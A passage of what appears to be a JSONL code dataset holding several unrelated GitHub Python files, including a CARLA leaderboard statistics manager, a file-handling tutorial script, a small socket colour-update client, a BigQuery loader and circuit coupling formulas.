optimizer.state_dict(),\n }, save_name)\n else:\n save_name = os.path.join(output_dir, 'fcos_{}_{}_{}.pth'.format(args.session, epoch, step))\n save_checkpoint({\n 'session': args.session,\n 'epoch': epoch + 1,\n 'model': det_net.module.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, save_name)\n print('save model: {}'.format(save_name))\n\n end = time.time()\n print(end - start)\n","repo_name":"suhumathe/FCOSReproduce","sub_path":"exec/train_net.py","file_name":"train_net.py","file_ext":"py","file_size_in_byte":10306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23217940146","text":"from functools import cmp_to_key\nimport sys\nimport re\nfrom collections import deque\n\nread = sys.stdin.readline\nalphabets = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz'\npriority = {a: i for i, a in enumerate(alphabets)}\n\n\ndef parse_char(s: str) -> list:\n if s.isnumeric():\n return [s]\n return list(s)\n\n\ndef parse_line(s: str) -> list:\n ret = []\n for c in s:\n if c.isalpha():\n ret.append(c)\n continue\n\n if ret and ret[-1].isnumeric():\n ret[-1] += c\n continue\n ret.append(c)\n return ret\n\n\ndef compare_int(n1: str, n2: str) -> int:\n if int(n1) == int(n2):\n return len(n1)-len(n2)\n return int(n1)-int(n2)\n\n\ndef compare(s1: str, s2: str) -> int:\n s1 = parse_line(s1)\n s2 = parse_line(s2)\n length = min(len(s1), len(s2))\n\n for c1, c2 in zip(s1[:length], s2[:length]):\n if c1.isnumeric() and c2.isnumeric():\n if compare_int(c1, c2) == 0:\n continue\n return compare_int(c1, c2)\n if c1.isnumeric():\n return -1\n elif c2.isnumeric():\n return 1\n elif priority[c1] == priority[c2]:\n continue\n else:\n return priority[c1]-priority[c2]\n return len(s1)-len(s2)\n\n\nN = int(read())\n\nstrings = [read().rstrip() for _ in range(N)]\nprint(*sorted(strings, key=cmp_to_key(compare)), sep=\"\\n\")","repo_name":"mozzieongit/Bike-Project","sub_path":"boj/prob20210.py","file_name":"prob20210.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73543102568","text":"from __future__ import print_function\n\nfrom dictor import dictor\nimport math\nimport sys\nfrom datetime import datetime\nimport csv\n\nfrom srunner.scenariomanager.traffic_events import TrafficEventType\n\nfrom leaderboard.utils.checkpoint_tools import fetch_dict, save_dict, create_default_json_msg\n\nPENALTY_COLLISION_PEDESTRIAN = 0.50\nPENALTY_COLLISION_VEHICLE = 0.60\nPENALTY_COLLISION_STATIC = 0.65\nPENALTY_TRAFFIC_LIGHT = 0.70\nPENALTY_STOP = 0.80\n\n\nclass RouteRecord():\n def __init__(self):\n self.route_id = None\n self.index = None\n self.status = 'Started'\n self.infractions = {\n 'collisions_pedestrian': [],\n 'collisions_vehicle': [],\n 'collisions_layout': [],\n 'red_light': [],\n 'stop_infraction': [],\n 'outside_route_lanes': [],\n 'route_dev': [],\n 'route_timeout': [],\n 'vehicle_blocked': []\n }\n\n self.scores = {\n 'score_route': 0,\n 'score_penalty': 0,\n 'score_composed': 0\n }\n\n self.meta = {}\n\n\ndef to_route_record(record_dict):\n record = RouteRecord()\n for key, value in record_dict.items():\n setattr(record, key, value)\n\n return record\n\n\ndef compute_route_length(config):\n trajectory = config.trajectory\n\n route_length = 0.0\n previous_location = None\n for location in trajectory:\n if previous_location:\n dist = math.sqrt((location.x-previous_location.x)*(location.x-previous_location.x) +\n (location.y-previous_location.y)*(location.y-previous_location.y) +\n (location.z - previous_location.z) * (location.z - previous_location.z))\n route_length += dist\n previous_location = location\n\n return route_length\n\n\nclass StatisticsManager(object):\n\n \"\"\"\n This is the statistics manager for the CARLA leaderboard.\n It gathers data at runtime via the scenario evaluation criteria.\n \"\"\"\n\n def __init__(self):\n self._master_scenario = None\n self._registry_route_records = []\n\n def resume(self, endpoint):\n data = fetch_dict(endpoint)\n\n if data and dictor(data, '_checkpoint.records'):\n records = data['_checkpoint']['records']\n\n for record in records:\n self._registry_route_records.append(to_route_record(record))\n\n def set_route(self, route_id, index):\n\n self._master_scenario = None\n route_record = RouteRecord()\n route_record.route_id = route_id\n route_record.index = index\n\n if index < len(self._registry_route_records):\n # the element already exists and therefore we update it\n self._registry_route_records[index] = route_record\n else:\n self._registry_route_records.append(route_record)\n\n def set_scenario(self, scenario):\n \"\"\"\n Sets the scenario from which the statistics will be taken.\n \n This works in conjunction with set_route so that the variable\n is only active when the simulation is active, to avoid statistic\n errors in case something breaks between simulations \n \"\"\"\n self._master_scenario = scenario\n\n def compute_route_statistics(self, config, duration_time_system=-1, duration_time_game=-1, failure=\"\"):\n \"\"\"\n Compute the current statistics by evaluating all relevant scenario criteria\n \"\"\"\n index = config.index\n\n if not self._registry_route_records or index >= len(self._registry_route_records):\n raise Exception('Critical error with the route registry.')\n\n # fetch latest record to fill in\n route_record = self._registry_route_records[index]\n\n target_reached = False\n score_penalty = 1.0\n score_route = 0.0\n driving_score = 0.0\n collisions_pedestrian = 0\n collisions_vehicle = 0\n collisions_layout = 0\n red_light = 0\n stop_infraction = 0\n outside_route_lanes = 0\n route_dev = 0\n route_timeout = 0\n vehicle_blocked = 0\n\n route_length = compute_route_length(config)\n\n route_record.meta['duration_system'] = duration_time_system\n route_record.meta['duration_game'] = duration_time_game\n route_record.meta['route_length'] = route_length\n\n if self._master_scenario:\n if self._master_scenario.timeout_node.timeout:\n route_record.infractions['route_timeout'].append('Route timeout.')\n failure = \"Agent timed out\"\n\n for node in self._master_scenario.get_criteria():\n if node.list_traffic_events:\n # analyze all traffic events\n for event in node.list_traffic_events:\n if event.get_type() == TrafficEventType.COLLISION_STATIC:\n score_penalty *= PENALTY_COLLISION_STATIC\n route_record.infractions['collisions_layout'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.COLLISION_PEDESTRIAN:\n score_penalty *= PENALTY_COLLISION_PEDESTRIAN\n route_record.infractions['collisions_pedestrian'].append(event.get_message())\n \n elif event.get_type() == TrafficEventType.COLLISION_VEHICLE:\n score_penalty *= PENALTY_COLLISION_VEHICLE\n route_record.infractions['collisions_vehicle'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.OUTSIDE_ROUTE_LANES_INFRACTION:\n score_penalty *= (1 - event.get_dict()['percentage'] / 100)\n route_record.infractions['outside_route_lanes'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.TRAFFIC_LIGHT_INFRACTION:\n score_penalty *= PENALTY_TRAFFIC_LIGHT\n route_record.infractions['red_light'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.ROUTE_DEVIATION:\n route_record.infractions['route_dev'].append(event.get_message())\n failure = \"Agent deviated from the route\"\n\n elif event.get_type() == TrafficEventType.STOP_INFRACTION:\n score_penalty *= PENALTY_STOP\n route_record.infractions['stop_infraction'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.VEHICLE_BLOCKED:\n route_record.infractions['vehicle_blocked'].append(event.get_message())\n failure = \"Agent got blocked\"\n\n elif event.get_type() == TrafficEventType.ROUTE_COMPLETED:\n score_route = 100.0\n target_reached = True\n elif event.get_type() == TrafficEventType.ROUTE_COMPLETION:\n if not target_reached:\n if event.get_dict():\n score_route = event.get_dict()['route_completed']\n else:\n score_route = 0\n\n # update route scores\n route_record.scores['score_route'] = score_route\n route_record.scores['score_penalty'] = score_penalty\n driving_score = max(score_route*score_penalty, 0.0)\n route_record.scores['score_composed'] = driving_score\n\n # update status\n if target_reached:\n route_record.status = 'Completed'\n else:\n route_record.status = 'Failed'\n if failure:\n route_record.status += ' - ' + failure\n\n # Save results as .txt\n now = datetime.now()\n now = now.strftime(\"%Y-%m-%d\")\n txt_file = \"/workspace/results/log_\" + now + \".txt\"\n \n output = \"\\n\\n\"\n output += \"------------------------ROUTE_RECORD: -------------------------\\n\"\n output += \"*** Route_id:\" + str(route_record.route_id) + \"\\n\"\n output += \"*** Index:\" + str(route_record.index) + \"\\n\"\n output += \"*** Status:\" + str(route_record.status) + \"\\n\"\n output += \"*** Infractions:\" + str(route_record.infractions) + \"\\n\"\n output += \"*** Scores:\" + str(route_record.scores) + \"\\n\"\n output += \"*** Meta:\" + str(route_record.meta) + \"\\n\"\n output += \"---------------------------------------------------------------\\n\"\n\n with open(txt_file, \"a\") as file_object:\n file_object.write(output)\n \n print(\"Saveing statistics in: \", txt_file)\n\n # Save results as .csv\n \n csv_file = \"/workspace/results/log_statistics_\" + now + \".csv\"\n rows = []\n\n total_rl = 0.0\n total_ds = 0.0\n total_rc = 0.0\n total_ip = 0.0\n total_cp = 0\n total_cv = 0\n total_cl = 0\n total_rli = 0\n total_ssi = 0\n total_ori = 0\n total_rd = 0\n total_rt = 0\n total_ab = 0\n \n try: \n with open(csv_file, mode='r') as data:\n csv_reader = csv.reader(data, delimiter = '\\t', lineterminator = '\\n')\n # extracting field names through first row\n fields_data = next(csv_reader)\n if fields_data[0] != 'Id':\n print(f\"Error in {csv_file}: incorrect file format.\")\n else:\n for row in csv_reader:\n if row[0] == '-': # Delimiter\n break\n else:\n rows.append(row)\n total_rl = total_rl + float(row[2])\n total_ds = total_ds + float(row[5])\n total_rc = total_rc + float(row[6])\n total_ip = total_ip + float(row[7])\n total_cp = total_cp + int(row[8])\n total_cv = total_cv + int(row[9])\n total_cl = total_cl + int(row[10])\n total_rli = total_rli + int(row[11])\n total_ssi = total_ssi + int(row[12])\n total_ori = total_ori + int(row[13])\n total_rd = total_rd + int(row[14])\n total_rt = total_rt + int(row[15])\n total_ab = total_ab + int(row[16])\n\n except:\n print(f\"{csv_file} file does not exist. Creating file.....\")\n\n id_actual = ''.join(filter(str.isdigit, route_record.route_id))\n\n n_data = (len(rows) + 1)\n \n route_length = float(\"{:.2f}\".format(route_length))\n\n duration_time_system = float(\"{:.2f}\".format(duration_time_system))\n duration_time_game = float(\"{:.2f}\".format(duration_time_game))\n driving_score = float(\"{:.3f}\".format(driving_score))\n score_route = float(\"{:.3f}\".format(score_route))\n score_penalty = float(\"{:.3f}\".format(score_penalty))\n\n average_ds = float(\"{:.3f}\".format((total_ds + driving_score) / n_data))\n average_rc = float(\"{:.3f}\".format((total_rc + score_route) / n_data))\n average_ip = float(\"{:.3f}\".format((total_ip + score_penalty) / n_data))\n\n total_rl = total_rl + route_length\n total_rl_kms = max(average_rc / 100 * total_rl / 1000.0, 0.001)\n\n collisions_pedestrian = len(route_record.infractions['collisions_pedestrian'])\n total_cp = float(\"{:.3f}\".format((total_cp + collisions_pedestrian)/total_rl_kms)) # infraction/km\n collisions_vehicle = len(route_record.infractions['collisions_vehicle'])\n total_cv = float(\"{:.3f}\".format((total_cv + collisions_vehicle)/total_rl_kms))\n collisions_layout = len(route_record.infractions['collisions_layout'])\n total_cl = float(\"{:.3f}\".format((total_cl + collisions_layout)/total_rl_kms))\n red_light = len(route_record.infractions['red_light'])\n total_rli = float(\"{:.3f}\".format((total_rli + red_light)/total_rl_kms))\n stop_infraction = len(route_record.infractions['stop_infraction'])\n total_ssi = float(\"{:.3f}\".format((total_ssi + stop_infraction)/total_rl_kms))\n outside_route_lanes = len(route_record.infractions['outside_route_lanes'])\n total_ori = float(\"{:.3f}\".format((total_ori + outside_route_lanes)/total_rl_kms))\n route_dev = len(route_record.infractions['route_dev'])\n total_rd = float(\"{:.3f}\".format((total_rd + route_dev)/total_rl_kms))\n route_timeout = len(route_record.infractions['route_timeout'])\n total_rt = float(\"{:.3f}\".format((total_rt + route_timeout)/total_rl_kms))\n vehicle_blocked = len(route_record.infractions['vehicle_blocked'])\n total_ab = float(\"{:.3f}\".format((total_ab + vehicle_blocked)/total_rl_kms))\n\n fields = ['Id', 'Town', 'RL', 'DST', 'DGT', 'DS', 'RC', 'IP', 'CP', 'CV', 'CL', 'RLI', 'SSI', 'ORI', 'RD', 'RT', 'AB']\n\n aux = [id_actual, config.town, str(route_length), str(duration_time_system), str(duration_time_game), str(driving_score), \n str(score_route), str(score_penalty), str(collisions_pedestrian), str(collisions_vehicle), str(collisions_layout),\n str(red_light), str(stop_infraction), str(outside_route_lanes), str(route_dev), str(route_timeout), str(vehicle_blocked)]\n rows.append(aux)\n aux = ['-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-']\n rows.append(aux)\n aux = ['', '', '', '', '', str(average_ds), str(average_rc), str(average_ip), str(total_cp), str(total_cv), str(total_cl), \n str(total_rli), str(total_ssi), str(total_ori), str(total_rd), str(total_rt), str(total_ab)]\n rows.append(aux)\n\n with open(csv_file, mode='w') as data:\n csv_writer = csv.writer(data, delimiter = '\\t', lineterminator = '\\n')\n csv_writer.writerow(fields)\n csv_writer.writerows(rows)\n\n print(\"Saved statistics in: \", csv_file)\n\n return route_record\n\n def compute_global_statistics(self, total_routes):\n global_record = RouteRecord()\n global_record.route_id = -1\n global_record.index = -1\n global_record.status = 'Completed'\n global_record.scores_std_dev = RouteRecord().scores\n\n if self._registry_route_records:\n for route_record in self._registry_route_records:\n global_record.scores['score_route'] += route_record.scores['score_route']\n global_record.scores['score_penalty'] += route_record.scores['score_penalty']\n global_record.scores['score_composed'] += route_record.scores['score_composed']\n\n for key in global_record.infractions.keys():\n route_length_kms = max(route_record.scores['score_route'] / 100 * route_record.meta['route_length'] / 1000.0, 0.001)\n if isinstance(global_record.infractions[key], list):\n global_record.infractions[key] = len(route_record.infractions[key]) / route_length_kms\n else:\n global_record.infractions[key] += len(route_record.infractions[key]) / route_length_kms\n\n if route_record.status is not 'Completed':\n global_record.status = 'Failed'\n if 'exceptions' != global_record.meta:\n global_record.meta['exceptions'] = []\n global_record.meta['exceptions'].append((route_record.route_id,\n route_record.index,\n route_record.status))\n\n for key in global_record.scores.keys():\n global_record.scores[key] /= float(total_routes)\n\n if total_routes == 1:\n for key in global_record.scores_std_dev.keys():\n global_record.scores_std_dev[key] = 'NaN'\n else:\n for route_record in self._registry_route_records:\n for key in global_record.scores_std_dev.keys():\n global_record.scores_std_dev[key] += math.pow(route_record.scores[key] - global_record.scores[key], 2)\n\n for key in global_record.scores_std_dev.keys():\n global_record.scores_std_dev[key] = math.sqrt(global_record.scores_std_dev[key] / float(total_routes - 1))\n\n # Save results as .txt\n now = datetime.now()\n now = now.strftime(\"%Y-%m-%d\")\n txt_file = \"/workspace/results/log_\" + now + \".txt\"\n\n output = \"\\n\\n\"\n output += \"------------------------GLOBAL_ROUTE: -------------------------\\n\"\n output += \"*** Route_id:\" + str(global_record.route_id) + \"\\n\"\n output += \"*** Index:\" + str(global_record.index) + \"\\n\"\n output += \"*** Status:\" + str(global_record.status) + \"\\n\"\n output += \"*** Infractions:\" + str(global_record.infractions) + \"\\n\"\n output += \"*** Scores:\" + str(global_record.scores) + \"\\n\"\n output += \"*** Meta:\" + str(global_record.meta) + \"\\n\"\n output += \"---------------------------------------------------------------\\n\"\n\n with open(txt_file, \"a\") as file_object:\n file_object.write(output)\n \n print(\"Saved global statistics in: \", txt_file)\n \n return global_record\n\n @staticmethod\n def save_record(route_record, index, endpoint):\n data = fetch_dict(endpoint)\n if not data:\n data = create_default_json_msg()\n\n stats_dict = route_record.__dict__\n record_list = data['_checkpoint']['records']\n if index > len(record_list):\n print('Error! No enough entries in the list')\n sys.exit(-1)\n elif index == len(record_list):\n record_list.append(stats_dict)\n else:\n record_list[index] = stats_dict\n\n save_dict(endpoint, data)\n\n @staticmethod\n def save_global_record(route_record, sensors, total_routes, endpoint):\n data = fetch_dict(endpoint)\n if not data:\n data = create_default_json_msg()\n\n stats_dict = route_record.__dict__\n data['_checkpoint']['global_record'] = stats_dict\n data['values'] = ['{:.3f}'.format(stats_dict['scores']['score_composed']),\n '{:.3f}'.format(stats_dict['scores']['score_route']),\n '{:.3f}'.format(stats_dict['scores']['score_penalty']),\n # infractions\n '{:.3f}'.format(stats_dict['infractions']['collisions_pedestrian']),\n '{:.3f}'.format(stats_dict['infractions']['collisions_vehicle']),\n '{:.3f}'.format(stats_dict['infractions']['collisions_layout']),\n '{:.3f}'.format(stats_dict['infractions']['red_light']),\n '{:.3f}'.format(stats_dict['infractions']['stop_infraction']),\n '{:.3f}'.format(stats_dict['infractions']['outside_route_lanes']),\n '{:.3f}'.format(stats_dict['infractions']['route_dev']),\n '{:.3f}'.format(stats_dict['infractions']['route_timeout']),\n '{:.3f}'.format(stats_dict['infractions']['vehicle_blocked'])\n ]\n\n data['labels'] = ['Avg. driving score',\n 'Avg. route completion',\n 'Avg. infraction penalty',\n 'Collisions with pedestrians',\n 'Collisions with vehicles',\n 'Collisions with layout',\n 'Red lights infractions',\n 'Stop sign infractions',\n 'Off-road infractions',\n 'Route deviations',\n 'Route timeouts',\n 'Agent blocked'\n ]\n\n entry_status = \"Finished\"\n eligible = True\n\n route_records = data[\"_checkpoint\"][\"records\"]\n progress = data[\"_checkpoint\"][\"progress\"]\n\n if progress[1] != total_routes:\n raise Exception('Critical error with the route registry.')\n\n if len(route_records) != total_routes or progress[0] != progress[1]:\n entry_status = \"Finished with missing data\"\n eligible = False\n else:\n for route in route_records:\n route_status = route[\"status\"]\n if \"Agent\" in route_status:\n entry_status = \"Finished with agent errors\"\n break\n\n data['entry_status'] = entry_status\n data['eligible'] = eligible\n\n save_dict(endpoint, data)\n\n \n\n @staticmethod\n def save_sensors(sensors, endpoint):\n data = fetch_dict(endpoint)\n if not data:\n data = create_default_json_msg()\n\n if not data['sensors']:\n data['sensors'] = sensors\n\n save_dict(endpoint, data)\n\n @staticmethod\n def save_entry_status(entry_status, eligible, endpoint):\n data = fetch_dict(endpoint)\n if not data:\n data = create_default_json_msg()\n\n data['entry_status'] = entry_status\n data['eligible'] = eligible\n save_dict(endpoint, data)\n\n @staticmethod\n def clear_record(endpoint):\n if not endpoint.startswith(('http:', 'https:', 'ftp:')):\n with open(endpoint, 'w') as fd:\n fd.truncate(0)\n","repo_name":"RobeSafe-UAH/CARLA_Leaderboard","sub_path":"routes_xml/utils/statistics_manager_robesafe.py","file_name":"statistics_manager_robesafe.py","file_ext":"py","file_size_in_byte":21887,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"8280047236","text":"from django import template\nfrom django.template.loader import render_to_string\n\nfrom page.models import Page\n\n\nregister = template.Library()\n\n\ndef navigation(parser, token):\n return NavigationNode()\n\n\nclass NavigationNode(template.Node):\n\n def render(self, context):\n nav_pages = Page.pages.filter(menu=True).order_by(\"-weight\")\n rendered_template = render_to_string(\"nav.html\",\n {\"pages\": nav_pages})\n return rendered_template\n\nregister.tag(\"navigation\", navigation)\n","repo_name":"Karajlug/karajlug","sub_path":"page/templatetags/page_nav.py","file_name":"page_nav.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71742442088","text":"import shutil\nimport os\nimport send2trash\nimport zipfile\n\nos.chdir('C:\\\\')\n#shutil.copy('C:\\\\BnetLog.txt', 'C:\\\\delicious')\n#shutil.copy('C:\\\\BnetLog.txt', 'C:\\\\delicious\\spam.txt')\n\n# shutil.copytree('C:\\\\New folder', 'C:\\\\New folder backup')\n#\n# shutil.move('C:\\\\BnetLog.txt', 'C:\\\\New folder backup2')\n# shutil.move('C:\\\\New folder backup2', 'C:\\\\backup')\n\n# Permanently deleting files and folders\n#os.unlink('C:\\\\backup')\n#os.rmdir('C:\\\\New f')\n#shutil.rmtree('C:\\\\New folder')\nos.chdir('C:\\\\Users\\ogi-8\\Desktop\\PythonProjects')\nwith open('file.txt', 'a') as bacon_file:\n bacon_file.write('Bacon isn\\'t a vegetable.')\n\n\nsend2trash.send2trash('file.txt')\n#Walking a directory tree\n\n# Reading Zip Files\n\nexample_zip = zipfile.ZipFile('ToDoList.zip')\nprint(example_zip.namelist())\n\nspam_info = example_zip.getinfo('toDo.py')\nprint(spam_info.file_size)\nprint(spam_info.compress_size)\n\nprint('Compressed file is {} smaller!'.format(round(spam_info.file_size / spam_info.compress_size, 2)))\nexample_zip.close()\n\n# Extracting from ZIP files\n\nexample_zip = zipfile.ZipFile('ToDoList.zip')\nexample_zip.extractall('C:\\\\Users\\ogi-8\\Desktop\\PythonProjects\\ToDo2')\nexample_zip.close()\n\n\nexample_zip = zipfile.ZipFile('ToDoList.zip')\nexample_zip.extract('toDo.py')\nexample_zip.close()\n\n# Creating and adding to ZIP files\n\nnew_zip = zipfile.ZipFile('file.zip', 'w')\nnew_zip.write('git comments.txt', compress_type=zipfile.ZIP_DEFLATED)\nnew_zip.close()\n\nzip_file = zipfile.ZipFile('file.zip')\nzip_file.extract('git comments.txt', 'C:\\\\Users\\ogi-8')\nzip_file.close()\n","repo_name":"jakubfolta/AutomateTheBoringStuffWithPython","sub_path":"organizing_files.py","file_name":"organizing_files.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2241102259","text":"import socket\nimport sys\nimport random\n\nSERVER_HOST = \"129.80.111.96\"\nSERVER_PORT = 6969\n\nif len(sys.argv) != 2 or (sys.argv[1] != 'update' and sys.argv[1] != 'monitor'):\n\tprint(f\"usage: {sys.argv[0]} update | monitor\")\n\tprint(sys.argv)\n\tsys.exit(2)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((SERVER_HOST, SERVER_PORT))\n\nif sys.argv[1] == \"update\":\n\t# read current\n\tcurrent = int.from_bytes(s.recv(1), 'big')\n\tprint(f\"current color is {current}\")\n\n\t# update...\n\tnewcolor = random.randint(1, 6)\n\tprint(f\"updating color to {newcolor}\")\n\ts.sendall(newcolor.to_bytes(1, 'big'))\n\n\t# read new color\n\tcurrent = int.from_bytes(s.recv(1), 'big')\n\tassert current == newcolor, \"new color does not match\"\n\n\ts.close()\n\tsys.exit(0)\n\nwhile True:\n\t# read whenever we can\n\trawdata = s.recv(1)\n\tif len(rawdata) == 0: break\n\tprint(f\"current color is {int.from_bytes(rawdata, 'big')}\")\n","repo_name":"jaytlang/him","sub_path":"server/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70737873128","text":"from datetime import datetime\n\nfrom google.cloud import bigquery\n\nDATASET = \"BingAds\"\n\n\ndef add_batched_at(rows: list[dict], schema: list[dict]):\n return (\n [\n {**row, \"_batched_at\": datetime.utcnow().isoformat(timespec=\"seconds\")}\n for row in rows\n ],\n [*schema, {\"name\": \"_batched_at\", \"type\": \"TIMESTAMP\"}],\n )\n\n\ndef load(table: str, schema: list[dict]):\n def _load(rows: list[dict]) -> int:\n if not rows:\n return 0\n\n client = bigquery.Client()\n\n _rows, _schema = add_batched_at(rows, schema)\n\n output_rows = (\n client.load_table_from_json(\n _rows,\n f\"{DATASET}.{table}\",\n job_config=bigquery.LoadJobConfig(\n schema=_schema,\n create_disposition=\"CREATE_IF_NEEDED\",\n write_disposition=\"WRITE_APPEND\",\n ),\n )\n .result()\n .output_rows\n )\n\n return output_rows\n\n return _load\n","repo_name":"hieumdd/excellize-bing-ads","sub_path":"db/bigquery.py","file_name":"bigquery.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1983198443","text":"import json\nimport pickle\nimport re\nfrom collections import defaultdict\nfrom typing import Any as NDArray\nfrom typing import Dict, List, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom tqdm import tqdm\nfrom transformers import AutoTokenizer\n\n\ndef generate(\n dataset: Dict,\n):\n tokenizer = AutoTokenizer.from_pretrained(\n \"cl-tohoku/bert-base-japanese-whole-word-masking\"\n )\n X = []\n Y = []\n Z = []\n X_sentence = []\n X_target_verb = []\n Y_ga = []\n Y_wo = []\n Y_ni = []\n loader = DatasetLoading()\n for x, y, z in loader.making_intra_datasets():\n ids, is_target_verb = x\n return samples\n\n\nclass DatasetLoading:\n def __init__(\n self,\n _datasets,\n media=[\"OC\", \"OY\", \"OW\", \"PB\", \"PM\", \"PN\"],\n ):\n self.media = media\n self.tokenizer = AutoTokenizer.from_pretrained(\n \"cl-tohoku/bert-base-japanese-whole-word-masking\"\n )\n\n def making_intra_datasets(self, datasets):\n for domain in self.media:\n print(f\"--- start loading {domain} ---\")\n for file in datasets.keys():\n if domain in file:\n df = datasets[file]\n for sentential_df in self._to_sentential_df(df):\n for x, y in self._df_to_intra_vector(sentential_df):\n yield x, y, file\n\n def _to_sentential_df(self, df):\n last_sentence_indices = df[\"is文末\"][df[\"is文末\"] == True].index\n start = 0\n for index in last_sentence_indices:\n end = index\n yield df.loc[start:end]\n start = index + 1\n\n def _case_id_to_index(self, df, case_id, case_type, is_intra):\n if (\n case_type == \"none\"\n or case_type == \"exoX\"\n or case_type == \"exo2\"\n or case_type == \"exo1\"\n ):\n return str((df[\"単語\"] == \"\").idxmax())\n elif is_intra and case_type == \"inter(zero)\":\n return str((df[\"単語\"] == \"\").idxmax())\n else:\n return str((df[\"id\"] == case_id).idxmax())\n\n def _df_to_intra_vector(self, df):\n token = df[\"単語\"].values\n ids = self.tokenizer.convert_tokens_to_ids(token)\n\n for index, row in df.iterrows():\n if row[\"verb_type\"] == \"noun\" or row[\"verb_type\"] == \"pred\":\n y = row.loc[[\"ga\", \"ga_type\", \"o\", \"o_type\", \"ni\", \"ni_type\"]].copy()\n cases = [\"ga\", \"o\", \"ni\"]\n for case in cases:\n case_types = y[f\"{case}_type\"].split(\",\")\n case_ids = y[f\"{case}\"].split(\",\")\n case_indices = []\n for case_type, case_id in zip(case_types, case_ids):\n case_index = self._case_id_to_index(\n df, case_id, case_type, True\n )\n case_indices.append(case_index)\n case_indices = \",\".join(case_indices)\n y[case] = case_indices\n is_target_verb = np.zeros_like(ids)\n is_target_verb[index] = 1\n x = (ids, is_target_verb)\n y = ()\n z = (token, row[\"verb_type\"])\n yield x, y, z\n","repo_name":"mzk622/BERT-for-PAS","sub_path":"src/datagenerator/bccwj_intra/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42514057968","text":"import requests\nfrom ebooks.provider.ebook import Ebook\nfrom ebooks.provider.ebook_provider import EbookProvider\n\n\nclass WereadEbookProvider(EbookProvider):\n def __init__(self):\n self.url = 'https://weread.qq.com/web/search/global?' \\\n 'keyword={}&maxIdx={}&count=20'\n\n def get_ebooks(self, title, last_book_index, page_index):\n url = self.url.format(title, last_book_index)\n response = requests.get(url)\n\n if response.status_code != requests.codes.ok:\n raise Exception(response.text)\n\n body = response.json()\n books = body.get('books', [])\n ebooks = map(self.__convert_to_ebook, books)\n\n return list(filter(self.__is_valid_book, ebooks))\n\n def __convert_to_ebook(self, book):\n book_info = book.get('bookInfo')\n\n if book_info.get('format') != 'epub' or book_info.get('soldout') == 1:\n return None\n\n ebook = Ebook()\n ebook.title = book_info.get('title', '')\n ebook.author = book_info.get('author', '')\n ebook.price = book_info.get('price', 0.0)\n ebook.cover = book_info.get('cover', '')\n ebook.abstract = book_info.get('intro', '')\n\n return ebook\n\n def __is_valid_book(self, book):\n return book is not None\n","repo_name":"Frederick-S/ebooks-api","sub_path":"ebooks/provider/weread.py","file_name":"weread.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41076091498","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\nimport common_formulas as cf\n\ndef lumped_model_Z21_no_ind(omega, Cq1, Cc1, Cr, Lr, Cc2, Cq2):\n\n Zq1 = cf.Zcap(Cq1, omega)\n Zc1 = cf.Zcap(Cc1, omega)\n Zr = cf.Zres(Cr, Lr, omega)\n Zc2 = cf.Zcap(Cc2, omega)\n Zq2 = cf.Zcap(Cq2, omega)\n\n # All the following currents are scaled by V2\n Iq2 = 1/Zq2\n Vr = 1 + Iq2*Zc2\n Ir = Vr/Zr\n V1 = Vr + Zc1 * (Iq2+Ir)\n Iq1 = V1/Zq1\n\n # Z21 = V2/I1\n # See documentation for the derivation of this formula\n Z21 = 1/(Iq2 + Ir + Iq1)\n\n return Z21\n\"\"\"\nCq1 = 53.8e-15\nCc1 = 5.08e-15\nCq2 = 40.6e-15\nCc2 = 4.6e-15\n\nLq = 5.95e-9\n\nf1 = cf.omega_r(Cq1, Lq)/2/np.pi\nf2 = cf.omega_r(Cq2, Lq)/2/np.pi\n\nomega1 = f1*2*np.pi\nomega2 = f2*2*np.pi\n\n\nres_len = 2255e-6\nCr, Lr = cf.lumped_l_2_resonator_C_and_L(res_len)\n\nprint(np.abs(lumped_model_Z21_no_ind(omega1, Cq1, Cc1, Cr, Lr, Cc2, Cq2)))\n\nZ1 = lumped_model_Z21_no_ind(omega1, Cq1, Cc1, Cr, Lr, Cc2, Cq2)\nZ2 = lumped_model_Z21_no_ind(omega2, Cq1, Cc1, Cr, Lr, Cc2, Cq2)\n\n\nJ = cf.lumped_elements_j_formula(omega1, omega2, Z1, Z2, Lq, Lq)\n \nprint(J/2/np.pi/1e6)\n\"\"\"\n","repo_name":"qipe-nlab/coupled-transmission-line-utils","sub_path":"q_q/q_q_formulas.py","file_name":"q_q_formulas.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29640492581","text":"import sys\nsys.path.append('.')\nfrom models.__event import OfflineEvent\nfrom functions.event import get_address, get_time\n\ntext = 